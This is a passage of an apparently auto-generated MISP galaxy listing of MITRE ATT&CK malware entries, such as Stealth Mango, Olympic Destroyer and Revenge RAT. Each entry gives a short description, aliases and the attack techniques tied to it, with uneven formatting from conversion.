• uses: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

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https://attack.mitre.org/software/S0362


Stealth Mango - S0328

[Stealth Mango](https://attack.mitre.org/software/S0328) is Android malware that has reportedly been used to successfully compromise the mobile devices of government officials, members of the military, medical professionals, and civilians. The iOS malware known as [Tangelo](https://attack.mitre.org/software/S0329) is believed to be from the same developer. (Citation: Lookout-StealthMango)

The tag is: misp-galaxy:mitre-malware="Stealth Mango - S0328"

Stealth Mango - S0328 is also known as:

• Stealth Mango

Stealth Mango - S0328 has relationships with:

• uses: misp-galaxy:mitre-attack-pattern="Location Tracking - T1430" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Access Contact List - T1432" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1533" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Access Call Log - T1433" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1456" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Access Calendar Entries - T1435" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Capture Audio - T1429" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Alternate Network Mediums - T1438" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Application Discovery - T1418" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1422" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Supply Chain Compromise - T1474" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Capture Camera - T1512" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="SMS Control - T1582" with estimative-language:likelihood-probability="almost-certain"

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<tr>
<td><a href="https://attack.mitre.org/software/S0328">https://attack.mitre.org/software/S0328</a></td>
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</tbody>
</table>

**Corona Updates - S0425**

[Corona Updates](https://attack.mitre.org/software/S0425) is Android spyware that took advantage of the Coronavirus pandemic. The campaign distributing this spyware is tracked as Project Spy. Multiple variants of this spyware have been discovered to have been hosted on the Google Play Store. (Citation: TrendMicro Coronavirus Updates)

The tag is: `misp-galaxy:mitre-malware="Corona Updates - S0425"`

Corona Updates - S0425 is also known as:

• Corona Updates

• Wabi Music

• Concipit1248

Corona Updates - S0425 has relationships with:

• uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1533" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Access Contact List - T1432" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Access Call Log - T1433" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1422" with estimative-language:likelihood-probability="almost-certain"

Table 4422. Table References

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<tr>
<td><a href="https://attack.mitre.org/software/S0425">https://attack.mitre.org/software/S0425</a></td>
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</table>

Gold Dragon - S0249

Gold Dragon - S0249 is a Korean-language, data gathering implant that was first observed in the wild in South Korea in July 2017. Gold Dragon was used along with Brave Prince and RunningRAT in operations targeting organizations associated with the 2018 Pyeongchang Winter Olympics. (Citation: McAfee Gold Dragon)

The tag is: misp-galaxy:mitre-malware="Gold Dragon - S0249"

Gold Dragon - S0249 is also known as:

- Gold Dragon

Gold Dragon - S0249 has relationships with:

Table 4423. Table References

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<th>Links</th>
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</table>
| [Caterpillar WebShell](https://attack.mitre.org/software/S0572) | [Caterpillar WebShell](https://attack.mitre.org/software/S0572) is a self-developed Web Shell tool created by the group [Volatile Cedar](https://attack.mitre.org/groups/G0123). (Citation: ClearSky Lebanese Cedar Jan 2021)

The tag is: `misp-galaxy:mitre-malware="Caterpillar WebShell - S0572"`

Caterpillar WebShell - S0572 is also known as:

- Caterpillar WebShell
Caterpillar WebShell - S0572 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Rootkit - T1014" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Local Groups - T1069.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"

Table 4424. Table References

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<tr>
<td><a href="https://attack.mitre.org/software/S0572">https://attack.mitre.org/software/S0572</a></td>
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</table>
Cobian RAT - S0338

[Cobian RAT](https://attack.mitre.org/software/S0338) is a backdoor, remote access tool that has been observed since 2016. (Citation: Zscaler Cobian Aug 2017)

The tag is: `misp-galaxy:mitre-malware="Cobian RAT - S0338"`

Cobian RAT - S0338 is also known as:

- Cobian RAT

Cobian RAT - S0338 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Video Capture - T1125" with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

Table 4425. Table References

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<tr>
<td><a href="https://attack.mitre.org/software/S0338">https://attack.mitre.org/software/S0338</a></td>
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</table>

Cardinal RAT - S0348

[Cardinal RAT](https://attack.mitre.org/software/S0348) is a potentially low volume remote access trojan (RAT) observed since December 2015. [Cardinal RAT](https://attack.mitre.org/software/S0348) is notable for its unique utilization of uncompiled C# source code and the Microsoft Windows built-in csc.exe compiler. (Citation: PaloAlto CardinalRat Apr 2017)

The tag is: `misp-galaxy:mitre-malware="Cardinal RAT - S0348"`

Cardinal RAT - S0348 is also known as:
Cardinal RAT

Cardinal RAT - S0348 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
Golden Cup - S0535

[Golden Cup](https://attack.mitre.org/software/S0535) is Android spyware that has been used to target World Cup fans. (Citation: Symantec GoldenCup)

The tag is: `misp-galaxy:mitre-malware="Golden Cup - S0535"`

Golden Cup - S0535 is also known as:

- Golden Cup

Golden Cup - S0535 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1420"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Data from Local System - T1533"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Location Tracking - T1430"` with estimative-language:likelihood-probability="almost-certain"
Table 4427. Table References

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<td><a href="https://attack.mitre.org/software/S0535">https://attack.mitre.org/software/S0535</a></td>
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</table>

**Olympic Destroyer - S0365**

[Olympic Destroyer](https://attack.mitre.org/software/S0365) is malware that was used by [Sandworm Team](https://attack.mitre.org/groups/G0034) against the 2018 Winter Olympics, held in Pyeongchang, South Korea. The main purpose of the malware was to render infected computer systems inoperable. The malware leverages various native Windows utilities and API calls to carry out its destructive tasks. [Olympic Destroyer](https://attack.mitre.org/software/S0365) has worm-like features to spread itself across a computer network in order to maximize its destructive impact. (Citation: Talos Olympic Destroyer 2018)(Citation: US District Court Indictment GRU Unit 74455 October 2020)

The tag is: *misp-galaxy:mitre-malware*="Olympic Destroyer - S0365"

Olympic Destroyer - S0365 is also known as:

- Olympic Destroyer

Olympic Destroyer - S0365 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Lateral Tool Transfer - T1570" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with
estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Data Destruction - T1485" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Service Stop - T1489" with estimative-language:likelihood-probability="almost-certain"

Table 4428. Table References

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<td><a href="https://attack.mitre.org/software/S0365">https://attack.mitre.org/software/S0365</a></td>
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<tr>
<td><a href="https://blog.talosintelligence.com/2018/02/olympic-destroyer.html">https://blog.talosintelligence.com/2018/02/olympic-destroyer.html</a></td>
</tr>
</tbody>
</table>

Revenge RAT - S0379

[Revenge RAT](https://attack.mitre.org/software/S0379) is a freely available remote access tool written in .NET (C#).(Citation: Cylance Shaheen Nov 2018)(Citation: Cofense RevengeRAT Feb 2019)

The tag is: misp-galaxy:mitre-malware="Revenge RAT - S0379"

Revenge RAT - S0379 is also known as:

- Revenge RAT

Revenge RAT - S0379 has relationships with:
• uses: misp-galaxy:mitre-attack-pattern="Video Capture - T1125" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Audio Capture - T1123" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1065" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Mshta - T1218.005" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Bidirectional Communication - T1102.002" with estimative-language:likelihood-probability="almost-certain"

Table 4429. Table References
Rising Sun - S0448

[Rising Sun](https://attack.mitre.org/software/S0448) is a modular backdoor malware used extensively in Operation [Sharpshooter](https://attack.mitre.org/groups/G0104). The malware has been observed targeting nuclear, defense, energy, and financial services companies across the world. [Rising Sun](https://attack.mitre.org/software/S0448) uses source code from [Lazarus Group](https://attack.mitre.org/groups/G0032)'s Trojan Duuzer. (Citation: McAfee Sharpshooter December 2018)

The tag is: `misp-galaxy:mitre-malware="Rising Sun - S0448"`

Rising Sun - S0448 is also known as:

- Rising Sun

Rising Sun - S0448 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Indicator Removal on Host - T1070"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140"` with estimative-language:likelihood-probability="almost-certain"
DEFENSOR ID - S0479

[DEFENSOR ID](https://attack.mitre.org/software/S0479) is a banking trojan capable of clearing a victim's bank account or cryptocurrency wallet and taking over email or social media accounts. [DEFENSOR ID](https://attack.mitre.org/software/S0479) performs the majority of its malicious functionality by abusing Android’s accessibility service. (Citation: ESET DEFENSOR ID)

The tag is: `misp-galaxy:mitre-malware="DEFENSOR ID - S0479"`

DEFENSOR ID - S0479 is also known as:

- DEFENSOR ID

DEFENSOR ID - S0479 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Screen Capture - T1513"` with `estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Input Injection - T1516"` with `estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Application Discovery - T1418"` with `estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Broadcast Receivers - T1402"` with `estimative-language:likelihood-probability="almost-certain"
Tiktok Pro - S0558

[Tiktok Pro](https://attack.mitre.org/software/S0558) is spyware that has been masquerading as the TikTok application. (Citation: Zscaler TikTok Spyware)

The tag is: `misp-galaxy:mitre-malware="Tiktok Pro - S0558"`

Tiktok Pro - S0558 is also known as:

- Tiktok Pro

Tiktok Pro - S0558 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Suppress Application Icon - T1508"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Masquerade as Legitimate Application - T1444"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Foreground Persistence - T1541"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Location Tracking - T1430"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Input Prompt - T1411"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Screen Capture - T1513"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Broadcast Receivers - T1402"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Application Discovery - T1418"` with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Delete Device Data - T1447" with estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-attack-pattern="SMS Control - T1582" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1420" with estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1533" with estimative-language:likelihood-probability="almost-certain"


Table 4432. Table References

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<td><a href="https://attack.mitre.org/software/S0558">https://attack.mitre.org/software/S0558</a></td>
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<tr>
<td><a href="https://www.zscaler.com/blogs/security-research/tiktok-spyware">https://www.zscaler.com/blogs/security-research/tiktok-spyware</a></td>
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</tbody>
</table>

**Trojan-SMS.AndroidOS.FakeInst.a - S0306**

[Trojan-SMS.AndroidOS.FakeInst.a](https://attack.mitre.org/software/S0306) is Android malware. (Citation: Kaspersky-MobileMalware)

The tag is: *misp-galaxy:mitre-malware="Trojan-SMS.AndroidOS.FakeInst.a - S0306"*

Trojan-SMS.AndroidOS.FakeInst.a - S0306 is also known as:

- Trojan-SMS.AndroidOS.FakeInst.a

Trojan-SMS.AndroidOS.FakeInst.a - S0306 has relationships with:


Table 4433. Table References

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<tr>
<td><a href="https://attack.mitre.org/software/S0306">https://attack.mitre.org/software/S0306</a></td>
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</table>
Trojan-SMS.AndroidOS.Agent.ao - S0307

[Trojan-SMS.AndroidOS.Agent.ao](https://attack.mitre.org/software/S0307) is Android malware. (Citation: Kaspersky-MobileMalware)

The tag is: `misp-galaxy:mitre-malware="Trojan-SMS.AndroidOS.Agent.ao - S0307"`

Trojan-SMS.AndroidOS.Agent.ao - S0307 is also known as:

- Trojan-SMS.AndroidOS.Agent.ao

Trojan-SMS.AndroidOS.Agent.ao - S0307 has relationships with:


Table 4434. Table References

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</table>

Trojan-SMS.AndroidOS.OpFake.a - S0308

[Trojan-SMS.AndroidOS.OpFake.a](https://attack.mitre.org/software/S0308) is Android malware. (Citation: Kaspersky-MobileMalware)

The tag is: `misp-galaxy:mitre-malware="Trojan-SMS.AndroidOS.OpFake.a - S0308"`

Trojan-SMS.AndroidOS.OpFake.a - S0308 is also known as:

- Trojan-SMS.AndroidOS.OpFake.a

Trojan-SMS.AndroidOS.OpFake.a - S0308 has relationships with:


Table 4435. Table References

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<td><a href="https://attack.mitre.org/software/S0308">https://attack.mitre.org/software/S0308</a></td>
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</table>
**Mis-Type - S0084**

[Mis-Type](https://attack.mitre.org/software/S0084) is a backdoor hybrid that was used by [Dust Storm](https://attack.mitre.org/groups/G0031) in 2012. (Citation: Cylance Dust Storm)

The tag is: `misp-galaxy:mitre-malware="Mis-Type - S0084"`

Mis-Type - S0084 is also known as:

- Mis-Type

Mis-Type - S0084 has relationships with:

- **uses**: `misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043"` with [estimative-language:likelihood-probability="almost-certain"]

- **uses**: `misp-galaxy:mitre-attack-pattern="Local Account - T1087.001"` with [estimative-language:likelihood-probability="almost-certain"]

- **uses**: `misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008"` with [estimative-language:likelihood-probability="almost-certain"]

- **uses**: `misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033"` with [estimative-language:likelihood-probability="almost-certain"]

- **uses**: `misp-galaxy:mitre-attack-pattern="Local Account - T1136.001"` with [estimative-language:likelihood-probability="almost-certain"]

- **uses**: `misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095"` with [estimative-language:likelihood-probability="almost-certain"]

- **uses**: `misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001"` with [estimative-language:likelihood-probability="almost-certain"]


- **uses**: `misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003"` with [estimative-language:likelihood-probability="almost-certain"]

- **uses**: `misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001"` with [estimative-language:likelihood-probability="almost-certain"]

- **uses**: `misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005"` with [estimative-language:likelihood-probability="almost-certain"]

- **uses**: `misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016"` with [estimative-language:likelihood-probability="almost-certain"]

- **uses**: `misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082"` with [estimative-language:likelihood-probability="almost-certain"]

Table 4436. Table References

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<td><a href="https://attack.mitre.org/software/S0084">https://attack.mitre.org/software/S0084</a></td>
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S-Type - S0085

[S-Type](https://attack.mitre.org/software/S0085) is a backdoor that was used by [Dust Storm](https://attack.mitre.org/groups/G0031) from 2013 to 2014. (Citation: Cylance Dust Storm)

The tag is: `misp-galaxy:mitre-malware="S-Type - S0085"

S-Type - S0085 is also known as:

- S-Type

S-Type - S0085 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Local Account - T1136.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Local Account - T1087.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008"` with estimative-language:likelihood-probability="almost-certain"

Table 4437. Table References

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</table>
Hi-Zor - S0087

[Hi-Zor](https://attack.mitre.org/software/S0087) is a remote access tool (RAT) that has characteristics similar to [Sakula](https://attack.mitre.org/software/S0074). It was used in a campaign named INOCNATION. (Citation: Fidelis Hi-Zor)

The tag is: `misp-galaxy:mitre-malware="Hi-Zor - S0087"`

Hi-Zor - S0087 is also known as:

- Hi-Zor

Hi-Zor - S0087 has relationships with:

- similar: `misp-galaxy:rat="Hi-Zor" with estimative-language:likelihood-probability="likely"
- uses: `misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010" with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

Table 4438. Table References

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<tr>
<td><a href="https://attack.mitre.org/software/S0087">https://attack.mitre.org/software/S0087</a></td>
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</table>
Miner-C - S0133

[Miner-C](https://attack.mitre.org/software/S0133) is malware that mines victims for the Monero cryptocurrency. It has targeted FTP servers and Network Attached Storage (NAS) devices to spread. (Citation: Softpedia MinerC)

The tag is: `misp-galaxy:mitre-malware="Miner-C - S0133"`

Miner-C - S0133 is also known as:

- Miner-C
- Mal/Miner-C
- PhotoMiner

Miner-C - S0133 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Taint Shared Content - T1080"` with estimative-language:likelihood-probability="almost-certain"

Table 4439. Table References

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<td><a href="https://attack.mitre.org/software/S0133">https://attack.mitre.org/software/S0133</a></td>
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Aria-body - S0456

[Aria-body](https://attack.mitre.org/software/S0456) is a custom backdoor that has been used by [Naikon](https://attack.mitre.org/groups/G0019). (Citation: CheckPoint Naikon May 2020)

The tag is: `misp-galaxy:mitre-malware="Aria-body - S0456"`

Aria-body - S0456 is also known as:

- Aria-body

Aria-body - S0456 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001"` with estimative-language:likelihood-probability="almost-certain"

- uses: `misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001"` with estimative-language:likelihood-probability="almost-certain"


- uses: `misp-galaxy:mitre-attack-pattern="Native API - T1106"` with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Data from Removable Media - T1025" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Token Impersonation/Theft - T1134.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Create Process with Token - T1134.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Application Window Discovery - T1010" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560" with estimative-language:likelihood-probability="almost-certain"

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Links

https://attack.mitre.org/software/S0456


**Android/Chuli.A - S0304**

[Android/Chuli.A](https://attack.mitre.org/software/S0304) is Android malware that was delivered to activist groups via a spearphishing email with an attachment. (Citation: Kaspersky-WUC)

The tag is: `misp-galaxy:mitre-malware="Android/Chuli.A - S0304"`

Android/Chuli.A - S0304 is also known as:

- Android/Chuli.A

Android/Chuli.A - S0304 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Location Tracking - T1430" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426" with estimative-language:likelihood-probability="almost-certain"

*Table 4441. Table References*

Links

https://attack.mitre.org/software/S0304


**AndroidOS/MalLocker.B - S0524**

[AndroidOS/MalLocker.B](https://attack.mitre.org/software/S0524) is a variant of a ransomware family targeting Android devices. It prevents the user from interacting with the UI by displaying a
screen containing a ransom note over all other windows. (Citation: Microsoft MalLockerB)

The tag is: `misp-galaxy:mitre-malware="AndroidOS/MalLocker.B - S0524"`

AndroidOS/MalLocker.B - S0524 is also known as:

- AndroidOS/MalLocker.B

AndroidOS/MalLocker.B - S0524 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Masquerade as Legitimate Application - T1444"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Broadcast Receivers - T1402"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Device Lockout - T1446"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406"` with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0524">https://attack.mitre.org/software/S0524</a></td>
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</table>

Android/AdDisplay.Ashas - S0525

[Android/AdDisplay.Ashas](https://attack.mitre.org/software/S0525) is a variant of adware that has been distributed through multiple apps in the Google Play Store. (Citation: WeLiveSecurity AdDisplayAshas)

The tag is: `misp-galaxy:mitre-malware="Android/AdDisplay.Ashas - S0525"`

Android/AdDisplay.Ashas - S0525 is also known as:

- Android/AdDisplay.Ashas

Android/AdDisplay.Ashas - S0525 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Masquerade as Legitimate Application - T1444"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Application Discovery - T1418"` with estimative-
• uses: misp-galaxy:mitre-attack-pattern="Broadcast Receivers - T1402" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Suppress Application Icon - T1508" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Evade Analysis Environment - T1523" with estimative-language:likelihood-probability="almost-certain"


• uses: misp-galaxy:mitre-attack-pattern="Generate Fraudulent Advertising Revenue - T1472" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0525">https://attack.mitre.org/software/S0525</a></td>
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**Trojan.Mebromi - S0001**

